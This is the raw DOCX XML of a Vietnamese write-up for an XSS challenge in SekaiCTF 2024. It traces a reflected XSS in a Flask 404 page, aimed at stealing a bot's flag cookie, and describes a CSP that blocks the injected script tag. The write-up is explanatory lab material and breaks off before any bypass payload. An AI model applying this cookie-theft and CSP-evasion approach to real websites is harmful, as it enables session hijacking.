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5F9125" w14:textId="075FA656" w:rsidR="002F49FE" w:rsidRDefault="002017FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đây là thử thách XSS mình làm trong giải SekaiCTF 2024</w:t>
      </w:r>
      <w:r w:rsidR="006F6780">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Lab này mình không build được Google Chrome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508FD38E" w14:textId="38B3D769" w:rsidR="002017FB" w:rsidRDefault="002017FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665BB567" w14:textId="2C6ED161" w:rsidR="002017FB" w:rsidRDefault="002017FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trang chủ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32633421" w14:textId="22D3B12E" w:rsidR="002017FB" w:rsidRDefault="002017FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E40E75C" w14:textId="4CABC7A4" w:rsidR="002017FB" w:rsidRDefault="002017FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01F7D6AE" wp14:editId="1E9EC9AE">
            <wp:extent cx="5943600" cy="4364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364990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7516B797" w14:textId="4C511409" w:rsidR="002017FB" w:rsidRDefault="002017FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D7A7409" w14:textId="0A06C8D8" w:rsidR="002017FB" w:rsidRDefault="007938F8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ở đây, chúng ta có thể nhập tin nhắn và nó sẽ xuất hiện trong hộp trắng bên dưới:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4153BF31" w14:textId="44DA8188" w:rsidR="007938F8" w:rsidRDefault="007938F8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA82A3B" w14:textId="7C8ABE0E" w:rsidR="007938F8" w:rsidRDefault="007938F8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D7964F3" wp14:editId="0D3D1CE9">
            <wp:extent cx="5943600" cy="46424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4642485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AA0DC1" w14:textId="3F9C7DDC" w:rsidR="007938F8" w:rsidRDefault="007938F8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719543F9" w14:textId="589477BF" w:rsidR="007938F8" w:rsidRDefault="0065053B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta không làm được gì nhiều ở đây, hãy đọc source code của ứng dụng web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C2AF21" w14:textId="11C56F8A" w:rsidR="0065053B" w:rsidRDefault="0065053B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E54BFD9" w14:textId="354741D5" w:rsidR="0065053B" w:rsidRDefault="0065053B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đầu tiên, mục tiêu của chúng ta trong thử thách này là gì? Flag nằm ở đâu?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B54599" w14:textId="0A3BC16C" w:rsidR="0065053B" w:rsidRDefault="0065053B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3178009C" w14:textId="746356A8" w:rsidR="0065053B" w:rsidRDefault="0065053B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong src/bot.py, chúng ta có thể thấy flag trong cookie flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22004DF0" w14:textId="00BAC10A" w:rsidR="0065053B" w:rsidRDefault="0065053B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="178C4FBD" w14:textId="0ED7F3F3" w:rsidR="0065053B" w:rsidRDefault="0065053B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B84AC77" wp14:editId="44370C19">
            <wp:extent cx="5943600" cy="6605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6605270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB67517" w14:textId="6A5D9DB4" w:rsidR="0065053B" w:rsidRDefault="0065053B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2477F15D" w14:textId="55E591C7" w:rsidR="0065053B" w:rsidRDefault="004319D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi phương thức visit được gọi, </w:t>
      </w:r>
      <w:r w:rsidR="00B356FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nó sẽ chạy trình duyệt Chrome và truy cập http://127.0.0.1:5000/, đặt cookie là flag. Sau đó, nó sẽ truy cập đến url.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6316639F" w14:textId="6CF8ACEA" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B0E8B44" w14:textId="20866E6D" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong src/app.py POST /report, chúng ta có thể gửi tham số url đến phương thức visit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604720DD" w14:textId="23C4B340" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C1D667B" w14:textId="56D54D3B" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79979B48" wp14:editId="22D4BFF8">
            <wp:extent cx="5943600" cy="57226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5722620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5000BCDB" w14:textId="1CF21F5C" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA9D09C" w14:textId="1C61CF94" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Do đó, mục tiêu của chúng ta là để trình duyệt Chrome (Bot) thực thi payload ở phía máy khách để trích xuất cookie flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6525FF" w14:textId="166FA18C" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53953FB7" w14:textId="201C4F0E" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tiếp theo, tìm lỗ hổng ở phía máy khách</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79119CEE" w14:textId="33BE564A" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28012A3A" w14:textId="1EBD74FF" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Một đường dẫn nổi bật nhất là trang 404:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E1AB3" w14:textId="1A932A7C" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD18847" w14:textId="68CD47AB" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32722DC2" wp14:editId="2AAA7813">
            <wp:extent cx="3505200" cy="111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3505200" cy="1117600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26435200" w14:textId="1913D79D" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2943585C" w14:textId="66038A73" w:rsidR="00B356FD" w:rsidRDefault="00B356FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ở đây, khi ứng dụng Flask gặp phải trạng thái 404, nó sẽ gọi hàm page_not_found. Trong hàm này, nó truyền URL path (request.path) đến </w:t>
      </w:r>
      <w:r w:rsidR="00676EB4" w:rsidRPr="00676EB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f"{path} not found"</w:t>
      </w:r>
      <w:r w:rsidR="00676EB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E34F25" w14:textId="1B601177" w:rsidR="00676EB4" w:rsidRDefault="00676EB4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F8ABF99" w14:textId="254E5CA9" w:rsidR="00676EB4" w:rsidRDefault="00676EB4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vì không có sanitization/ HTML entity encoding/ escaping, trang web bị dính lỗ hổng XSS. Cụ thể hơn là reflected XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A45792A" w14:textId="66461BD1" w:rsidR="00676EB4" w:rsidRDefault="00676EB4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA61FC8" w14:textId="6DD31F73" w:rsidR="00676EB4" w:rsidRDefault="00221E9A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thử tiêm thẻ &lt;script&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576A5FF5" w14:textId="26F02A79" w:rsidR="00221E9A" w:rsidRDefault="00221E9A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="669A3015" w14:textId="1F9DFFB0" w:rsidR="00221E9A" w:rsidRDefault="00221E9A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B1726FD" wp14:editId="4CF9E69C">
            <wp:extent cx="5943600" cy="2417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17445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B66BBD0" w14:textId="7F3FC8DD" w:rsidR="00595413" w:rsidRDefault="00595413">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D09D03A" w14:textId="6050DCEA" w:rsidR="00595413" w:rsidRDefault="00595413">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta tiêm thành công thẻ &lt;script&gt;! Tuy nhiên, hàm alert() không thực thi được. Tại sao?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937F113" w14:textId="1228273E" w:rsidR="00595413" w:rsidRDefault="00595413">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297637FD" w14:textId="13F5B6BF" w:rsidR="00595413" w:rsidRDefault="00595413">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu chúng ta xem trong mục console, chúng ta có thể </w:t>
      </w:r>
      <w:r w:rsidR="004B5A20">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nhìn thấy lỗi sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54707F19" w14:textId="7AC8C762" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0395EAA0" w14:textId="6A290680" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09C3B12B" wp14:editId="59ECBD5A">
            <wp:extent cx="5943600" cy="11017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101725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EB506A" w14:textId="063D7124" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2A1AFC" w14:textId="39E26403" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Đó là vì chỉ thị CSP script-src đang chặn nó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D238C40" w14:textId="17C83FD4" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="784573EA" w14:textId="5E0791BF" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong src/app.py, chúng ta có thể nhìn thấy tất cả phản hồi có chỉ thị CSP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636F3C54" w14:textId="3D6A4A97" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31BC6829" w14:textId="280ABF3C" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34ED5A5A" wp14:editId="01BF6ECF">
            <wp:extent cx="5943600" cy="7512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51205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5737F1" w14:textId="62E8A7BC" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1277CFB6" w14:textId="49F8BE70" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sao chép CSP vào </w:t>
      </w:r>
      <w:r w:rsidRPr="004B5A20">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Google CSP Evaluator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và xem cách để vượt qua nó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AEB6FC" w14:textId="57AEDBC1" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A315EC4" w14:textId="77777777" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204CE5B2" w14:textId="411494D0" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D9DBD6A" w14:textId="30434E1D" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29097FF0" wp14:editId="55FEEFD3">
            <wp:extent cx="5943600" cy="4423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23410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21188DEC" w14:textId="2AB88688" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="040DCCB4" w14:textId="20137206" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
